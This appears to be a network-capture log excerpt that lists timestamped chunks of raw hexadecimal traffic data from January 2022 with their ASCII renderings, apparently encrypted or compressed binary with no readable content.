                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6238INData Raw: 2a 47 c5 71 d1 ca 39 0d d2 f7 33 00 f5 d5 b5 69 e1 cc 61 c4 6a 55 76 4b 25 74 73 50 91 5c 91 05 88 36 40 93 f0 62 de 11 88 8d c4 65 2d 9a d0 d4 dd 68 a4 bb 17 4b 86 e3 ec 18 b5 8f c2 2e a2 2b e4 9d 44 d2 93 97 09 f3 6c 92 42 04 11 3b f8 45 b1 fb 7e 6c c5 98 51 26 a6 41 24 04 92 70 8e da 91 f5 ea 4d fe ad 81 6c e5 9d 63 dd f2 f5 68 63 ac e5 39 c9 e2 c2 7c 5e eb 10 51 d3 cb ae 84 e1 0b a9 c1 e3 42 a4 6e d6 d3 7b 74 01 16 98 b4 bb 47 2e ba da b7 d5 68 a8 98 e3 a4 5f 68 5d b0 1f fc 1e 46 12 cd ca 2a 9b 46 1c 0c b4 09 9a 55 53 14 d0 c9 12 90 f1 6f 0b 2e 50 d5 9e 0f 5e 7d 42 cb ca e8 f3 23 1d f0 93 f1 dc f7 a8 c3 ee 5a e5 fc 60 68 44 86 5c 50 7d 9c 3d c9 82 f9 3d e0 15 70 04 1c 5c 4f 89 19 96 99 a3 45 d3 c2 d5 8b 89 f5 67 7f 6b 0b ca ff 2a 10 d1 fc bf 46 f9 35
                                                                                                                                                                                                    Data Ascii: *Gq93iajUvK%tsP\6@be-hK.+DlB;E~lQ&A$pMlchc9|^QBn{tG.h_h]F*FUSo.P^}B#Z`hD\P}==p\OEgk*F5
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6254INData Raw: d3 4b 71 dd 91 77 5a 99 fe 42 46 cb f4 ed 87 3c 85 4c 2c 0e e5 cf 4a b5 37 b7 3a ec 65 71 e0 ad 77 28 ac 5e 6f a4 bf 3b cc 9a 13 e5 fc 57 f5 b2 66 4a 6b e8 01 36 9f 6b dc 71 9e 7e 36 c6 2e 4e 3d f0 cf aa 4c 3a f2 3a b8 3a 5f f1 31 72 fd 7d 72 52 ec 97 cc df 79 d4 a4 1e d9 ad a2 f1 ee 54 b3 89 64 6a 06 12 ea d7 2d 86 66 38 21 b3 38 67 06 3e 14 86 71 55 a1 8a 54 f7 48 91 82 fb 88 bb d4 f3 e2 8e 49 e9 95 1c 79 1d 23 c2 ec f1 6d 6b 1f 11 03 68 63 3e 71 cb 67 b4 5b d8 76 d4 06 ed 62 1f b3 99 90 0c 61 87 42 d7 ac 6f b4 5d f7 e1 78 01 7f 47 25 e8 79 69 66 b5 f2 9a 0d f7 db fa 2e 6d 8a e9 03 67 c6 b5 79 2f 18 a7 fe 78 21 ec 39 28 40 73 6f dd 7c 1e 08 1c 37 a5 e5 14 c4 0b f3 4c bc 5d 99 9a 95 77 fe a4 58 45 6b 1c bc b2 42 22 d8 db 43 a2 97 17 62 96 ee c9 11 9d 49
                                                                                                                                                                                                    Data Ascii: KqwZBF<L,J7:eqw(^o;WfJk6kq~6.N=L:::_1r}rRyTdj-f8!8g>qUTHIy#mkhc>qg[vbaBo]xG%yif.mgy/x!9(@so|7L]wXEkB"CbI
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6270INData Raw: 53 f4 56 99 30 4e 17 6d 37 ec ba 90 5c 5b 2e bc 47 22 f0 3b f9 6c e2 ef e3 b9 3a 5e 9c 3a 50 12 e8 85 a2 5f d3 b6 79 40 0b a8 fd 1d 89 d6 29 a4 9c 22 22 2a 15 0b 0f 77 b4 13 83 b8 f9 8e b0 cf 80 ed 1a cb 57 8c f3 c6 bd 80 2b 4e be 45 25 99 47 ea 05 52 2c 12 a0 af e9 3a c8 ca 33 c5 9d c4 cd 63 fd 5c 81 ea f4 6c 86 fc 63 8d d9 91 82 63 3b 8d 9f b8 83 c1 d5 e0 84 b6 7e 3a ed c3 79 3f 28 51 3f 62 a2 aa af ae 27 4c a0 1d 9d 70 5d 10 9c 55 cf 75 c8 2d 70 ee c7 f3 1d 44 60 cb 28 89 d1 0a e8 e3 b6 6a 1f 51 46 f8 66 fe 9c 2d 84 f9 ab 71 a5 ce d6 91 67 69 06 58 66 fa 4a fe 50 87 33 97 04 f4 d4 19 1a 19 13 26 1a aa 76 3b e9 c5 89 c0 48 c7 73 bb e4 34 7c e7 4c 5d 45 82 8d 15 27 e1 4c 04 97 17 de ee 68 5f b4 43 93 d9 5a 77 07 3b 87 d6 d4 10 03 a3 3f 70 53 6e f8 07 3c
                                                                                                                                                                                                    Data Ascii: SV0Nm7\[.G";l:^:P_y@)""*wW+NE%GR,:3c\lcc;~:y?(Q?b'Lp]Uu-pD`(jQFf-qgiXfJP3&v;Hs4|L]E'Lh_CZw;?pSn<
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6286INData Raw: a0 24 ed f6 c6 91 33 f5 14 45 71 f6 b2 ed 86 b7 52 ba ee b9 2c 7e 1a 41 7b ac 8a 85 82 57 1a fa 5f 4f f9 e8 35 fd 91 0b fa 11 49 f6 98 bf f0 29 36 cb 8e c7 b6 1a 71 f3 c4 b5 c1 09 5e db 49 25 9e e4 00 ec 6d 5a a5 16 74 0a eb d7 ec de 2f 84 30 7d 2e 17 74 ce 72 ae f6 a5 f6 bb cf 9a ac 1a 31 6c c2 6c f1 8f 2f 8e 61 26 f9 ed b1 66 ad a6 d3 c0 9b 61 a8 08 92 c2 0e 4e 3b a3 06 1c c0 66 a7 95 f1 3e 75 75 b8 01 a9 a8 49 a1 ef 52 90 bd 51 00 44 be ba 98 d7 50 7a a8 7f ce 5d c1 97 0a 1d 5b e8 a3 57 03 d2 55 81 d2 65 a1 da e5 b2 f0 6b de 82 a4 66 58 d4 6f d1 a9 ba 99 90 4d c2 f8 7e 13 bd 4a 58 15 48 39 78 e4 b9 6a d8 7e 85 2a c0 09 0d 9c a4 04 88 e8 1a 6e ec a9 82 fe 0f 3b 11 d9 41 0c e5 cc a6 16 f2 dd d5 89 42 91 b8 a8 7a c8 60 c1 f1 27 83 da 27 d4 6a ca f3 8c d4
                                                                                                                                                                                                    Data Ascii: $3EqR,~A{W_O5I)6q^I%mZt/0}.tr1ll/a&faN;f>uuIRQDPz][WUekfXoM~JXH9xj~*n;ABz`''j
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6302INData Raw: d3 22 4c 4d bb 76 ad 1f 25 7c 15 df 5a 93 54 cd ff 78 96 96 be c7 bf ed 3b 86 e5 d0 e3 8a 8d b6 e5 a1 8e 9c c6 a7 1f db c5 72 5c 5f b3 f4 2e a9 33 6a 40 fe 6c f2 01 4a 15 78 c0 07 35 f1 e0 4f 6d a7 e6 c8 2d b3 8a d4 e9 eb 14 a2 e5 03 b6 12 3a de 8b cc 63 17 a3 a8 65 9c 06 4e 27 45 fd a3 20 c1 60 36 0e bf b4 c2 f7 92 b0 8c 47 2d 30 28 ff 61 97 e3 df 7a 96 b9 51 49 e8 35 5a 22 9e cb 14 fb 83 8d 5a 0d 13 f6 4e ec b1 39 05 e4 4e c4 63 d7 32 ff 33 50 ed 2c 9d 51 88 61 33 70 a5 ae 1c 3e 84 f2 2e a4 0e 56 b8 4c e5 29 31 09 57 eb df d4 e4 b7 fd e6 31 65 19 96 62 2d 6a 4d 37 e7 2b ba e9 59 ee 9e 82 af 53 dc 62 d7 e4 7d c4 8d a3 d3 bf b4 8a 21 44 10 ba 16 8a 28 59 5d 4b 0f 4c a8 49 ac 63 91 c4 16 48 66 9f 14 02 e9 2a 19 2c fe 97 76 7f 33 58 ab f5 5a 9a 1f 36 49 2b
                                                                                                                                                                                                    Data Ascii: "LMv%|ZTx;r\_.3j@lJx5Om-:ceN'E `6G-0(azQI5Z"ZN9Nc23P,Qa3p>.VL)1W1eb-jM7+YSb}!D(Y]KLIcHf*,v3XZ6I+
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6318INData Raw: ff 76 43 03 ac 20 12 85 38 45 18 f4 32 c5 69 44 ae cd 65 d7 bd f1 7d 15 f7 ac e9 82 ff 16 e6 de ff cb c2 8c 1b 40 7a 4d 13 d7 b9 56 08 c4 65 4e db 0e 39 68 2e a5 6e df 95 7c 1d 5f 17 76 85 22 4d 52 bb f5 c1 7b 59 5e 43 89 83 05 8d a5 cb 41 e7 c1 52 89 17 54 e7 47 01 75 af 94 4e 3e 7f 5d 3c dc 10 92 42 8c 4d 3b a0 db df 7b df 2e 8f dc b5 3c 08 3b 35 3b 13 ac 2b 29 34 d3 d8 50 9f 6e 55 17 9c 9c c2 e0 ae fa 4d 1c 90 6b 90 52 bc 7b 2c 60 ea 46 92 d2 e4 15 03 04 52 4a de f5 c6 89 13 e2 c2 1b 55 64 0b 3c e9 49 5a 68 a9 f6 9a 75 5b 3c 1c 11 68 e7 37 d9 cf 93 7a 0f 7f 09 ad c2 fe 1f 91 a2 45 40 e6 b8 7a e2 13 62 39 55 8c 9d ce ea df 29 a1 d2 8f c8 69 90 59 57 6b 3a 8c 5d 69 2c f9 5e 44 59 ec 0e 8a be 1a f4 64 db bc 26 24 6e 65 66 08 ff 85 80 6c 9f 40 75 34 bb b0
                                                                                                                                                                                                    Data Ascii: vC 8E2iDe}@zMVeN9h.n|_v"MR{Y^CARTGuN>]<BM;{.<;5;+)4PnUMkR{,`FRJUd<IZhu[<h7zE@zb9U)iYWk:]i,^DYd&$nefl@u4
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6334INData Raw: a4 ce cf 58 32 8d 9c 81 47 d7 f2 4e a0 60 2c 94 7c fe 57 46 ca 4e d1 86 c5 98 76 d9 5a b3 15 5f bb b9 70 91 4f 5d a5 58 6c c9 0e b3 ac 84 57 2e 3c 7b 0d 4f 97 11 74 f5 6e 4c a8 70 2e 1f 86 97 5d 9e 68 00 a0 03 72 12 c3 a3 3f c0 09 70 32 5e 34 de 02 86 1a a3 82 42 cd 75 de 6a 48 99 4a 6e d4 eb e8 c1 97 a7 98 da 54 5a bb 19 aa 7f 88 42 f0 4e 18 bc e1 29 1a 66 7a e5 53 66 81 e4 f7 c6 2d 03 d2 d0 ff 06 fa 90 e1 fa 94 7b a4 72 47 91 41 37 1e 11 43 39 19 75 54 66 06 b9 e6 95 e6 87 49 28 4b fd f2 52 04 79 03 ae 2d 74 c6 03 c2 96 20 cc 9e d0 85 13 dd a3 35 29 4a 43 9a 87 ae 62 9c 6c 9b 09 03 fa 55 dc 53 48 4d af e5 67 3b 75 65 66 c1 9d 5f 01 ea 5a 5e 4e 53 78 bc 6b 4b 9e ea 73 e9 2e 01 34 9f 2b 87 43 e6 ea 37 ec a2 0b 83 c8 1b 47 df e5 97 19 4b b8 dc d6 20 46 63
                                                                                                                                                                                                    Data Ascii: X2GN`,|WFNvZ_pO]XlW.<{OtnLp.]hr?p2^4BujHJnTZBN)fzSf-{rGA7C9uTfI(KRy-t 5)JCblUSHMg;uef_Z^NSxkKs.4+C7GK Fc
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6350INData Raw: 77 9e 22 6f 54 d2 7f 0c fd b2 1d 78 95 ac 75 9a 82 76 9f ef 3f 58 ff 78 fd 6c 32 8e 39 0c 65 86 29 df d7 42 d3 e5 9a df 26 f5 13 79 17 23 10 8d 2f 71 76 8e 9f ed 40 07 d8 33 5b 82 1d c4 8b df 1d e1 f0 5e c4 56 6d 60 7a e9 48 d7 b3 06 73 be 19 f2 b5 48 1f df fe 11 71 24 c1 24 20 2c 8e eb ad 18 93 69 f2 a9 c4 49 b0 32 80 fa f3 24 fe 22 04 72 aa 8b 20 0b dc 54 d2 96 68 73 71 60 ca 80 a1 cb 7c 20 29 a6 bc f0 ae 70 0a b1 25 25 5c ec cf 37 b0 d0 a7 98 1b 26 41 d3 b0 e9 16 fc 9a 38 b6 84 b9 e0 4a b2 22 66 90 5c f1 aa 24 d2 bc 20 f1 39 43 a8 4d 67 9a 61 07 db c5 38 34 fd 9f 5a 01 b9 9a 22 a9 8f 22 c1 03 ce cb a7 fd 6e 84 65 64 32 da 72 27 12 0e c7 61 fb f4 b3 1d bd 49 94 d9 69 a5 6b ab 4b 86 c6 5e a5 b0 22 9a 26 9b ba cb c3 d8 ae fb c8 8d e4 4f c6 99 c4 ff 1d de
                                                                                                                                                                                                    Data Ascii: w"oTxuv?Xxl29e)B&y#/qv@3[^Vm`zHsHq$$ ,iI2$"r Thsq`| )p%%\7&A8J"f\$ 9CMga84Z""ned2r'aIikK^"&O
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6366INData Raw: 65 90 3e ad 9c d1 3d 8d ba 2a 6a 2f 4a eb 37 9f 78 e2 d1 2c c6 ee cc 45 f9 9f 9a c9 de 51 25 44 99 d9 fe e2 4e e7 38 5d ea f5 c5 78 ac 50 03 08 7b 49 c2 6f 09 15 bf ed 18 c9 81 5f 54 5f f8 54 83 df 33 37 9d c4 d3 24 d9 29 1f f6 6a be 58 0d 98 7a ee bb ea a7 f2 3e 96 a7 3f 97 43 1a 61 4e 56 91 7d 94 19 40 91 40 66 76 1a 4d a5 cc bc 3c c4 e1 33 74 f1 0b b0 21 8a 83 b9 33 16 f5 65 ce 3a d2 48 42 28 83 ed b0 1e c0 ec e9 09 0d 36 48 f6 2e 69 1d 78 d6 f5 6f e9 de cb 0d ba bf 33 d3 87 00 67 37 68 f7 1a c9 31 4e 6a 30 11 2f e2 3a 2f c3 17 be 80 f4 04 ef d5 41 b4 d5 23 fb 8b 8a 04 2e 68 71 9f c1 e2 4f 63 5c 89 94 97 72 ef 27 30 2a b3 d2 ca 44 21 9d 96 29 8c 6b 09 cc 62 ab 19 6b e3 45 a8 74 f6 1c 5d 6f 70 9c d9 8d 6c 39 1a 06 b0 4c 05 38 32 70 09 01 36 84 71 bd 45
                                                                                                                                                                                                    Data Ascii: e>=*j/J7x,EQ%DN8]xP{Io_T_T37$)jXz>?CaNV}@@fvM<3t!3e:HB(6H.ixo3g7h1Nj0/:/A#.hqOc\r'0*D!)kbkEt]opl9L82p6qE
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6382INData Raw: a4 da f0 51 c5 d4 d9 ea 72 67 ef 9a db f2 13 b0 5a 6b 77 68 24 2a 41 c4 f2 e2 01 69 c0 8f 43 22 91 b4 26 3e 9c f3 ce ce ac fa ed 24 06 26 76 7e 84 3e 0b 2a 83 a2 fc 78 91 9d 24 3e 60 20 8c a2 2c 77 62 d5 74 27 ca 64 9b f9 c7 d5 e9 fd 88 f7 ee 9b cd db 98 50 cd 82 91 26 d0 94 1c 4e 8f 08 20 7f f9 fa 61 41 87 2b e3 ae 98 e0 82 e1 9e 95 83 b2 d3 1f 87 45 b2 9d 5e eb 58 e8 9a 56 06 52 e9 91 2d d1 ac 02 7d 9b d3 df 32 a8 1c 62 10 2f 10 fa fa 3d 0f 66 6b a8 7b 43 d4 b6 1a db 85 23 f5 cf ed f6 29 28 96 53 60 ad 9f 16 8f 6e fb 55 bf 0c a6 05 f3 52 f2 2f 91 26 b7 4f 0b af b9 7c fd 31 70 29 9e 86 6d 76 8c 1d 35 81 84 f6 80 b3 81 9c d1 84 cf 8d d3 ed 81 dd 1f de 53 69 e6 5a 3f 20 96 72 32 2c 4c f6 4d 1b 46 e1 e5 5d df 69 8e d9 b2 e8 6e 24 b6 c1 ea d1 73 6c 88 75 ba
                                                                                                                                                                                                    Data Ascii: QrgZkwh$*AiC"&>$&v~>*x$>` ,wbt'dP&N aA+E^XVR-}2b/=fk{C#)(S`nUR/&O|1p)mv5SiZ? r2,LMF]in$slu
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6398INData Raw: 9b 5c 88 62 71 9b 9e 41 fa c3 0f 36 5e 04 b1 e7 26 96 6f 79 0e 19 8c 27 9b a1 52 6b 82 36 41 2a c0 aa ea 32 65 05 57 cd 34 ba 24 c3 a4 b0 45 d6 86 78 04 be 12 77 f2 a6 87 fd c1 88 24 82 ae 79 89 fa c8 af 0c 63 bc c2 31 98 44 c3 09 2b 54 1c 09 d5 f3 ab 73 e3 04 b9 c4 ff 08 c5 07 8f 67 20 f1 ed 91 2a 79 1b 24 f6 5a 62 ea 7b 42 56 72 fc 5c e9 a0 d4 70 03 e9 c7 7a 06 05 c1 99 43 a3 5f 54 c9 60 75 58 af ae b8 4b 06 76 2f 78 38 fc e1 a5 c5 0e c1 e2 22 4c 54 86 26 e2 79 b7 56 59 91 a8 68 e9 90 fb 44 b5 c6 1c 1e 79 fe fd 17 3c d1 67 fe 49 1c b2 7a 8b 34 56 79 d1 82 f8 3e 8e 7f 90 5b 06 8d 39 3e be f7 80 bc 2e ac 79 5c 5b 98 d1 e6 b8 ad 75 bf a4 c6 8e 41 c8 12 7a 56 83 e2 0e 07 e9 ff 44 1d 15 f4 96 5d 0f e2 c1 77 51 58 66 7b 46 81 af cc a8 c3 aa 55 73 4e c9 23 f5
                                                                                                                                                                                                    Data Ascii: \bqA6^&oy'Rk6A*2eW4$Exw$yc1D+Tsg *y$Zb{BVr\pzC_T`uXKv/x8"LT&yVYhDy<gIz4Vy>[9>.y\[uAzVD]wQXf{FUsN#
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6414INData Raw: 8c 21 4a 99 f6 e4 72 76 db 04 35 94 57 17 3e 90 f0 e3 22 ed 7a ab 3c 01 0d 81 50 86 c1 b6 65 40 b4 23 b4 db 06 56 c8 d3 cf 4b 57 aa 77 f7 c2 aa e6 dc 99 bf 9f f7 3c 48 b9 3b 43 7e 6b 23 33 86 84 74 37 86 ed d8 bd f9 62 e1 28 6d 23 de 16 66 a3 e0 c6 3e f6 34 5b 22 78 8d 83 1c 91 39 c3 85 4e b7 f0 ea b1 50 87 a5 0e bf 9c e0 ac fb ef e9 f8 fd ec a2 fc 81 86 de a3 e9 f9 97 be a2 4a 37 18 3e a6 21 4d 3f 5d a9 2d 60 8e 19 01 d9 ed bb c4 7c d9 7a 85 01 9f b4 c5 16 e5 4c b8 6a c9 0d 00 8e 96 f1 5c 50 ab 01 6d 0c 08 2e 16 13 22 ec 4c 9c 0b 75 5c e6 b3 2a a4 df ba 11 54 26 ff a0 c3 9d f7 f7 91 3c d0 3d 9e 5f a2 bb 7c 6e 99 bc 6b 6a b6 67 bd 04 61 04 4c 20 1f e2 ca 26 15 12 c9 23 aa a7 be e3 1f 6a 71 c0 86 c8 cc 58 cd 9e 90 06 86 d8 6c e6 e3 02 20 8e e4 ef 9f 4a c0
                                                                                                                                                                                                    Data Ascii: !Jrv5W>"z<Pe@#VKWw<H;C~k#3t7b(m#f>4["x9NPJ7>!M?]-`|zLj\Pm."Lu\*T&<=_|nkjgaL &#jqXl J
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6430INData Raw: 19 ac af bb 50 bf 14 86 ef 0e 72 b7 57 ab b9 04 98 d9 ce d7 7c e4 06 a2 01 e7 de b6 77 30 d9 f7 24 1f 00 1f ee 9d c5 ab b2 1a e9 61 35 3a 1f 66 11 1f 62 d6 76 ad 56 29 71 f7 0a 1b 95 58 74 88 e7 6a 42 24 45 f4 23 84 a8 4e ae ab 7b 22 c3 20 9a a6 7c f9 1f 28 21 c3 9c 99 5b 25 11 02 8a 9b 93 be 7b ab cb 8e 0a 45 1e 4e 82 e1 cf 5f c6 e4 4a fb 70 c0 fb d4 7e ed 6a 06 89 eb 0a 59 e2 ee 24 cd 24 35 33 8f 07 c4 5b 74 5d f7 bb 4c 8c ea bb 72 07 b9 a2 56 6c 37 20 1d 9b 22 d6 a2 98 85 f0 5f 8b 60 16 da 66 66 28 da a5 e7 d9 62 f6 f7 0e 15 a3 d2 4e f1 78 67 9b c5 52 70 4c f3 0d 85 ff de 1c 1e 9d b6 a0 00 09 31 4f 05 de c0 23 bc 4f 8d 29 59 c8 12 12 83 25 0b ac 7c db ff 1b 08 c2 0e ba da b1 40 23 f5 c3 46 f4 41 fd 31 b3 6f 7e 8c f7 3a 88 cc a8 1e 16 7a 28 5a 30 ac 40
                                                                                                                                                                                                    Data Ascii: PrW|w0$a5:fbvV)qXtjB$E#N{" |(![%{EN_Jp~jY$$53[t]LrVl7 "_`ff(bNxgRpL1O#O)Y%|@#FA1o~:z(Z0@
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6446INData Raw: 42 92 76 fe 8c 45 69 d4 cf 2b 90 de 46 83 b2 d6 5e a0 14 45 b5 e4 26 b4 82 76 37 19 a2 74 a8 e9 5d f2 ce 6a 25 dd 28 49 14 7c e4 bc 6b a3 96 b8 a6 bc 16 a4 94 ef 04 f0 27 1e e5 62 4c f5 68 27 93 49 8b 09 11 2a 42 cf bf 67 1b 33 45 4d 68 05 a4 eb ef 6d 0b fd 25 81 73 85 e2 96 c2 75 85 f9 23 5d d3 ca 13 41 6e 71 83 db e7 11 dd 3e 27 f2 50 5c f6 31 1c 78 dd 8b 22 33 ff a2 af 86 69 7d 1a 38 e5 27 2e b5 7f 47 46 73 70 d3 a7 ee 4a e2 66 27 ea 29 51 f2 11 54 e4 5a 52 1e 1a 0a 20 fb 64 ba a3 bc 26 a2 04 47 1d 2b c6 02 b5 e5 c7 9e 58 0a 45 ce 5d 6b 8b 89 81 f6 cd 75 f2 4e 14 d9 4a b5 06 a4 da 35 80 11 52 9f 7e ea a8 bb 25 57 16 21 fc 79 83 e2 de c9 93 06 00 d9 40 8e 05 23 51 5d bb 12 7d 14 62 0e 70 52 34 a9 c5 63 6f e0 c6 ae da 19 c3 11 28 ba c3 7a a7 20 ea 53 35
                                                                                                                                                                                                    Data Ascii: BvEi+F^E&v7t]j%(I|k'bLh'I*Bg3EMhm%su#]Anq>'P\1x"3i}8'.GFspJf')QTZR d&G+XE]kuNJ5R~%W!y@#Q]}bpR4co(z S5
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6462INData Raw: 8a d3 27 fa 74 79 a4 28 92 1a d3 a7 6b 6f cf e8 a6 de 5b 7d e0 8c 77 69 0b b2 9b f7 e1 6e c5 12 e6 f9 50 d9 eb f2 52 24 91 de bc 16 08 a6 dc 3a 65 de 22 e6 f7 7c 59 48 b4 3a f6 1c 1d 19 a5 e5 a0 90 91 fe 31 09 a4 47 bd 00 b6 bc b4 00 0e 1d de fb f5 3c b1 26 2e 11 ca 99 e5 2e a9 34 85 66 b8 68 48 a9 50 0a 53 e5 9b be 02 e5 1f 0f 06 57 68 7f bf 61 28 0d 5d 0c 4e c4 70 a4 7f 6f c6 8c d2 3c 5d 9f 1e f1 96 6b d8 e7 9b c5 6a ca 37 10 ad 19 d9 e0 ea 7d 5d 7a a8 2a 26 4f f6 86 0c 9c 9d 3a 6a fe 2b 28 b4 41 c5 dc 5c 2a 2a bc 6d ee 85 4b 75 9c f1 44 20 08 13 d1 7e cd c6 9b 5d 4e 61 c1 ba 43 ff 12 4b 99 63 96 33 5d 34 ba a5 57 04 a6 2a ac 5d 31 61 bc 06 3a 22 db f2 7b 6c 48 c6 e0 82 ee 57 36 9f 9c 13 13 aa 77 01 52 f1 4f cb db 9e a6 a7 f7 4b f9 5e f0 33 f8 4c 3f 80
                                                                                                                                                                                                    Data Ascii: 'ty(ko[}winPR$:e"|YH:1G<&..4fhHPSWha(]Npo<]kj7}]z*&O:j+(A\**mKuD ~]NaCKc3]4W*]1a:"{lHW6wROK^3L?
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6478INData Raw: 20 7c 97 5d 76 16 fd 35 f4 d1 4f 45 b6 6b 80 f9 68 37 f1 ce 55 b6 c0 8f b2 4e 81 dc 53 3d 15 77 ac d6 cd 36 d9 3f 18 7e f8 63 f4 bf 4b d2 62 11 ab 8b 30 ea 10 f6 83 bf d6 0d d0 4f dc 67 08 1b 2d f0 51 12 74 ab 37 51 4d c9 9a 43 5b af 16 82 ca d0 ca 11 86 8b ae a1 5a eb d6 84 ae 28 71 d5 79 0d e1 bc 43 f2 72 02 51 b2 77 8f 80 bd 04 b2 23 0a 8b 95 43 7b 5e fb eb 37 e0 c4 0c 8d e9 f2 dc 2d d9 e6 27 f2 29 a6 40 90 e0 d0 e6 58 d2 bf 6e e4 74 7e dc 2a 11 60 be 77 62 5e 90 b0 4c ed 43 36 1f e9 54 b8 9c 19 b4 c5 b9 4c 8a 29 55 70 9d ff 12 ed 8a 69 63 b4 61 d8 48 fd e6 39 02 68 54 ac 0f 89 6b 69 e2 a4 58 c7 1e 8e fb 5a db af 54 06 43 15 9b 45 0c f2 1e 32 73 91 6f 21 fb a9 30 13 2c 5b 55 42 49 78 d6 a8 52 70 99 ed aa 75 1f 50 37 26 0f 14 fc 41 df 68 7a 76 25 3a 0a
                                                                                                                                                                                                    Data Ascii: |]v5OEkh7UNS=w6?~cKb0Og-Qt7QMC[Z(qyCrQw#C{^7-')@Xnt~*`wb^LC6TL)UpicaH9hTkiXZTCE2so!0,[UBIxRpuP7&Ahzv%:
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6494INData Raw: ed 6d a5 90 c9 62 f1 51 d3 b9 97 79 ec 64 af a9 e9 54 c6 61 4c be 51 83 b2 6b 8f 2e c6 80 ab de 19 9d 1d b6 55 bd c9 d0 5c a4 2d da af 71 73 53 f1 a9 b2 9e 6e 6e 44 1a 19 8b fb a7 ae 8f f4 82 9e ff 4f ac cb 27 6b 32 92 5c b0 aa 07 16 58 20 0f 40 54 eb 9b fa b2 19 1d a1 cb 53 77 3d a4 5d 5b bc 7f 40 e7 7b 65 c5 10 7e ee d2 b8 37 58 2d e0 f7 9f 64 96 79 de 67 45 d2 1e f7 01 68 6d b6 c2 55 09 cf 53 0f df 5b 96 84 55 d8 88 d2 02 9c b9 c5 53 fa d3 f2 f3 2f 13 3b 9e d1 4b 20 90 8a 6b 0a 3a 65 2e 6e 5a 97 bb b0 45 3e 71 39 80 fc ae b5 26 64 2e e7 4b eb 74 6f 37 35 64 8f 4b 34 92 07 d6 ff c4 aa 1b 5f 24 df 81 37 de 42 4f 1e d6 17 b3 a7 20 80 a8 11 df 53 1f 32 f6 33 e3 50 3a ab c7 7e 76 e1 15 ca c3 e3 50 20 15 09 dd 4c 7d cd a9 92 e3 63 50 a4 78 bf 14 ac b0 bf 50
                                                                                                                                                                                                    Data Ascii: mbQydTaLQk.U\-qsSnnDO'k2\X @TSw=][@{e~7X-dygEhmUS[US/;K k:e.nZE>q9&d.Kto75dK4_$7BO S23P:~vP L}cPxP
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6510INData Raw: ed 8c f1 3c 86 15 69 ff 08 de a8 6f d8 8d 5f 02 69 da 87 11 2e ab 23 00 89 bd c5 b0 1c a3 1b 6f fa dd cd ff b7 25 91 2e 36 e9 47 40 e4 73 82 20 03 ec 8a 21 00 90 13 f0 b6 60 17 8a 2d 86 ef d0 54 46 ff 62 33 5e 27 01 4a 4f ed a9 2d 8e 1e 47 c7 e4 fe 68 d6 25 23 ed 50 f5 9c ed 71 c8 bd 34 59 20 7b 09 db 41 60 03 ca 58 9d e1 49 99 9d 07 3c 0c ee 3f 35 12 ca 5c 3e 34 ad 03 09 5e 12 72 0a 7f e0 39 eb ca a3 45 f3 13 b6 38 3c 65 ee a3 05 b2 6e 5d ab 84 83 eb a4 e1 ac e8 48 be 93 87 ed 79 d4 e1 63 95 e6 95 2b fa 48 42 22 86 57 ef 21 9f f8 ff f3 eb 1c 8b 1e 16 ea 46 cf 36 7b 41 ce 53 ad 2a 15 80 d5 59 e4 5f 37 06 35 4c 86 22 b8 43 8f be 4f 4e a4 69 91 67 52 e0 d7 05 69 81 ee ca 0c f1 9a 0d 2c 84 5f a4 78 06 54 39 f0 17 8f ea d5 e8 c3 29 38 54 7e f4 19 39 05 68 1a
                                                                                                                                                                                                    Data Ascii: <io_i.#o%.6G@s !`-TFb3^'JO-Gh%#Pq4Y {A`XI<?5\>4^r9E8<en]Hyc+HB"W!F6{AS*Y_75L"CONigRi,_xT9)8T~9h
                                                                                                                                                                                                    2022-01-14 03:59:52 UTC6526INData Raw: 48 f1 be d7 b1 9e 85 3c f9 46 4e b7 6b 68 9a 0a ba d9 48 ea d7 06 d2 3a eb 66 6f 0f 41 36 7d b0 3b ed 82 e9 ae 9f 14 50 96 4c 68 e6 6f de 80 0f 09 67 0b d2 ee aa 40 2b a7 d6 27 b5 15 fb be 8c 3d a5 48 81 f3 80 40 d1 d6 bf a3 cd 4a b1 f7 5e 15 a8 1b 05 d2 05 d9 b9 17 d1 e9 01 36 77 8b 47 6a 80 28 05 9f 6f 9d e1 3f ff 25 28 4a cc c6 ff 32 8e b3 e2 0d bf 7f 62 c9 31 78 9e 90 71 d0 62 a7 38 6d 8a 52 aa 1c aa 99 06 45 0e 26 fa a8 75 05 8b 94 db 9b 15 1e e0 39 5b c0 79 8a 91 c0 45 4e 09 2f ad ad 09 7d d4 3b d4 c4 41 64 d1 0c a7 c4 08 fe e5 aa 8b f9 bd 73 e1 34 6a c0 72 98 d4 db db 47 d0 df b0 d2 40 85 a6 1d ff 07 8d 06 2f 20 52 33 36 37 fb c9 71 99 33 39 be b0 ea 84 b1 94 9f 21 14 36 fd 0b 52 f0 16 34 a6 eb e2 28 84 c8 2b 99 82 2a 69 3d 2d 91 cd 1f 66 7e 3a 1e
                                                                                                                                                                                                    Data Ascii: H<FNkhH:foA6};PLhog@+'=H@J^6wGj(o?%(J2b1xqb8mRE&u9[yEN/};Ads4jrG@/ R367q39!6R4(+*i=-f~:
